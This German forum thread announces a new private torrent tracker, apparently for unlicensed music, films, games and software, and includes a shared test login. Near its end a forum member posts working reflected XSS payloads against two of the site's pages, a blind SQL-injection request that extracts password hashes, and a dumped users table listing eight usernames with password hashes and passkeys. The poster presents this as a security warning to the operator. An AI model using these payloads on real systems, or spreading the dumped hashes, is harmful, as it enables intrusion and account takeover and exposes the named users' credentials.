Black Universe ist ein neuer Anti Leech Tracker der am 01.06.2017 startet. Die Seite ist schon Online und es gehen soweit alle functionen.
Zur Zeit werden noch Team Mitglieder gesucht.
DIe Registrierung ist momentan geöffnet.

Bitte beachtet das Momentan noch nicht viel los ist und es noch nicht so viele Files gibt.

Die Source läuft auf 2 Servern die per VPN verbunden sind, sowie über eine cloudfaire.
Das Radio und der TS3 Server laufen auf einem seperaten root.

Test Account :

Benutzer : testuser
PW : 123456abc

Info : Der Account ist eingeschräng ! Es ist zb. kein Download oder Upload möglich !

Wenn ihr euch Registriert und habt euch vorher über den Test Acccount eingeloggt, sendet eine Team PN mit der Info damit ihr eine Doppel Ip freigabe bekommt.

die URL lautet : https://black-universe.li

Pin ?

aso 1234

Registrierung fehlgeschlagen!
Die IP Adresse wird schon verwendet.

Vorher nicht mit Test Acc angemeldet. Wird meine Server IP wohl schon verwendet.

mit gmail.com registriert ? kann daran liegen. Ich habe den account sumfl0w aktiviert

habe secure-mail.biz

ok, ist frei der Account. müsstest dich einloggen können

- - - - - - - - - - Beitrag nachträglich erweitert - - - - - - - - - -

@unknown.pw E-Mail

dein Acc. ist aktiviert. Lag an der E-Mail da die im späm bereich liegt

Wofür seit ihr gut ?
Damit auch der ein oder andere nette User der nicht weiß, wofür ihr gut seit, auch erfährt was ihr zu bieten habt. ;)

Ich sehe in eurem Projekt leider keinen Mehrwert...

Trotzdem viel Glück :-)

Wie gesagt das ist ein neues projekt was am 01.06 startet.

Wofür wir gut sind ?

Bei uns gibt es, bzw. wird es alles mögliche an datein (Musik,Spiele,Filme,Software ect.)geben. (eigentlich alles ausser Kinder-/Tierpornos oder Rechte sachen)

Das ganze wird über sogenante .torrent datein geladen.

Der unterschied bei einem ALT liegt darin, das wenn man ein File geladen hat, mann ihn mindestens 48 std. bzw. bis zu einer Ratio von 1 (einmal kompllet) seeden muss. Gerne länger.

Betreffend Sicherheit. Die Source selbst und der Server läuft alles per vpn und SSL-256 bit AES-TLS gesichert.

Es ist halt eine etwas Sicherere alternative als über sogenante Open Tracker oder solche die über mehrere short links auf freehoster weiterleiten.

Und natürlich die Download geschwindigkeit. (je nach seeder anzahl bzw. root seeder und eigener Internet geschwindigkeit, sind Donloads bis 20MB/s und mehr möglich)

+ die Garantie das wenn min. 1 seeder drin ist, man das File auch fertig stellt.

Warum müssen deutsche Tracker eigentlich immer scheiße ausschauen? Die anderen Länder bekommen es doch auch in schick hin. Sprache klingt auch eher nach Ferienprojekt. Ihr sucht Team-Mitglieder & Team-Anwärter? Sollte sich das Team normalerweise nicht aus Team-Anwärter rekrutieren? Ihr (oder Du?) gehst ohne Team an den Start?

Außerdem warum kein Ocelot & Gazelle als Code-Basis?
Und spenden via Paypal? Junge, wir sind inzwischen im Bitcoin-Zeitalter ...

Und Hosting in DE bei Hosteurope? Cloudflare allein reicht nicht, man(n) muss auch wissen wie man es konfiguriert.

Ich würd sagen hör jetzt auf bevor noch jemand zu Schaden kommt.

Und Hosting in DE bei Hosteurope?



Wusste gar nicht, daß die Jungs mittlerweile zu den anerkannten Szenehostern gehören.

:-D :-D

? ehm host europe liegt die .li Domain ; ) der tracker selbst ist bei goodnet.ua

ukraine --- vpn ---- host --- clout
1 . . . . . . . . . . . . . . . 2

1. Server mit dem Tracker und speicher für den torrent ordner
2. Domain und Speicher für Bilder , NFO ....

Grafik wird noch angepasst, (ist ja auch noch nicht offen)
Spenden ist noch von früher drinn, weiß noch nicht ob ich es generell raus nehme

Hab dir gestern bereits ne PN geschrieben

gerade gesehen, hast antwort

Wollte mich gestern mal registrieren (dauert ja eigentlich nicht lange) um mal einen Blick drauf zu werfen. Leider wurde mir mit dem aktuellen FF (unter Linux) kein Button angezeigt um die Registrierung abzuschicken.

Unnötige Schreib/Tippfehler, wie "cloudfaire" und "clout", machen mich ziemlich nervös. Andere Leute empfinden das, gerade in einer Vorstellung, vermutlich noch deutlich negativer.

Bezüglich des Hosting: Nicht flunkern. Ihr nutzt definitiv (in welcher Weise genau kann man nur raten) auch einen Hosteurope Server. Ich würde dir definitiv davon abraten das weiter zu dementieren, denn sonst postet hier ganz schnell einer eure IP als Beweis (gefunden haben sie sicher schon einige). Auch die Domain dort zu haben ist relativ undurchdacht.

Insgesamt bin ich von diesem Projekt und der Vorstellung nicht überzeugt...

naja jedem das seine. Betreffend das Hosting ist es (so sage ich es mal) im grunde egal wo mann es macht (ausser strato). Verboten ist es bei Jedem hoster.

der unterschied ist gegenüber den anderen/meisten alt's das ich wirklich nur die source hoste und keine Files. Welches nicht verboten ist.

und das ich von hosteurope (ist ein anderer anbieter aber die server sind welche von denen) die Domain als weiterleitung zu dem Server nehme ist auch an und für sich nicht schlimm. (Schlimm währe es wenn ich auf dem host europe die source und files bzw. rtorrent ect. laufen lassen würde) aber für die paar files die ich seede bzw. der shoutcast und ts server befinden sich auf einem ovh root.

Das wenn man die url genau zurück verfolgt man einen anbieter bzw die ip von host herausbekommt ist nicht schwer. (egal wie man es verstecken möchte)

Bezüglich kein Button, kann ich nicht genau bestättigen ob es ein genereller fehler ist oder nur bei dir wegen dem Linux. (Die Seite ist für firefox @ windows programiert) andere browser gehen auch (betriebssysteme hab ich nicht getestet) unterstützen aber auch nicht alle funktionen

betr. der clout..... ich kenne keinen Großen oder szene alt der keine clout nutzt

Bezüglich des Wahrheitsgehaltes bzw. der Richtigkeit deiner Aussagen halte ich mich mal bedeckt. Eines kann ich dir allerdings versichern: Eine schlechte Wahl des Hostings oder der Domain hat durchaus das Potential einem Projekt das Genick zu brechen :)

ist schon richtig, aber für den anfang reicht es.
Wenn die seite mal gewisse aktivität hat, hole ich einen anderen url server und nimm die url mit. Nur sind mir da momentan umgerechnet ~20€/monat zuviel. (ca. 1,50 die domain und 18-20 der root)
Jetzt könnte man sagen warum nimmst du die url nicht einfach auf den ukraine root mit ? ganz einfach damit der haupt root wo die source läuft soweit unbekannt bleibt.

alternative könnte ich auch mit dyndns eine url erstellen und sie auf dem haupt root weiter leiten, dann währe aber die url bxp. black-universe.xyz.xy und das möchte ich nicht

Thema kann gelöscht werden.
Grund : project wird überarbeitet. Bei start gibt es ein neues Thema

so läuft das aber nicht, erst ankündigen, werben und dann direkt alles entfernen.
Der Beitrag wurde wiederhergestellt und du kannst das ganze dann auch hier weiterführen.

phpinfo() (http://www.black-universe.li/phpinfo.php)

Warum lässt jeder diesen Kram online?
Geht doch niemanden was an, was dort drin steht...

Unter diesen Umständen werde ich mich schonmal nicht registrieren...

Warum müssen deutsche Tracker eigentlich immer scheiße ausschauen?

Amen, Bruder.

Ich würde dem Themenstarter auch empfehlen etwas mehr in's Design zu investieren. Es macht mehr aus als man denkt.

An der Sicherheit sollte auch noch gearbeitet werden:
https://www.szenebox.org/images/_imported/2017/05/65.jpg

http://www.black-universe.li/recover.php | POST: email=TEST"><script>alert(String.fromCharCode(88,83,83));</script>

https://www.szenebox.org/images/_imported/2017/05/66.jpg

https://www.black-universe.li/coverurl.php?form="><script>alert(String.fromCharCode(88,83,83));</script>

Ebenfalls gibt es die möglichkeit SQL-Befehle zu injecten!
Ist die SQL-Abfrage valid so erscheint diese Meldung:
https://www.szenebox.org/images/_imported/2017/05/67.jpg

http://www.black-universe.li/forumstake.php?action=rate | POST: topicid=4&forumid=6&postid=(SELECT(CASE WHEN(ORD(MID((SELECT IFNULL(CAST(passhash AS CHAR ),0x20) FROM neu.users ORDER BY id LIMIT 0,1),32,1))NOT BETWEEN 0 AND 51)THEN 1 ELSE 1*(SELECT 1 FROM INFORMATION_SCHEMA.PLUGINS)END))&userid=31&returnto=forums.php?action=viewtopic&topicid=4&page=p4#p4&rating=3

Das ganze kann man dann noch automatisiert dumpen (Vorzugsweise mit sqlmap):

Database: neu
Table: users
[8 entries]
+----+-----------------+----------------------------------+-------------------------+
| id | username | passhash | passkey |
+----+-----------------+----------------------------------+-------------------------+
| 1 | D@rk-Ripper\x99 | ca59f625d7c9fbd505f3f069e922f054 | Û\x95ÉIzwxú |
| 24 | Loyd | 7e1734c6a4dcf3534f115b98a89f655d | íÛÃ\x8dâ3\r\x89 |
| 25 | Warlock | 2858ec3ddc45c1c3cdb35c06c3c8a32f | #MöÛ3\x1fW¹ |
| 26 | sumfl0w | 462ccbef5dc0734dada6806e739730cb | à¸\x92\x83\x15\x1dý\x95 |
| 27 | BabyRay | 3d66eaf3ec5b8bb9f3dd145c1acc6793 | i:½qI\x8dgý |
| 28 | ThaPUSHer | 93b91d70047a5e48fc15427b41f83aae | ÕÛ\x16ß_Ä.m |
| 29 | hddude | ae35c2f5600ea1643d6ae20c4533c0df | ÁÁmô\x7fvM\x05 |
| 31 | user123 | 36f561c263e02d142667f451871a34aa | ¡k/2{<P© |
+----+-----------------+----------------------------------+-------------------------+

An der Sicherheit sollte auch noch gearbeitet werden (Ist nicht der einzige Fund!):

Du olles Scriptkiddie xD *joke*, ne machste gut!

Warst zu schnell, schau es dir jetzt nochmal an!

P.S.: Für heute genug Mist im Netz verzapft, ich geh dann mal schlafen ;)

Warst zu schnell, schau es dir jetzt nochmal an!

P.S.: Für heute genug Mist im Netz verzapft, ich geh dann mal schlafen ;)

8 User xD da geht ja die Post ab ^^

Wobei user123 mein testacc war...

Dieses Thema wurde von einem Moderator aufgrund folgender Kriterien geschlossen.

[X] Service ist Offline
[X] Keine Rückmeldung des Erstellers
[X] Aktiver Support ist nicht gewährleistet
[ ] Sonstige Gründe

Sofern nachvollziehbare Gründe vorliegen kann dieses Thema wieder geöffnet werden.
Wende dich dazu bitte an einen Moderator.

Mfg Szenebox.org Team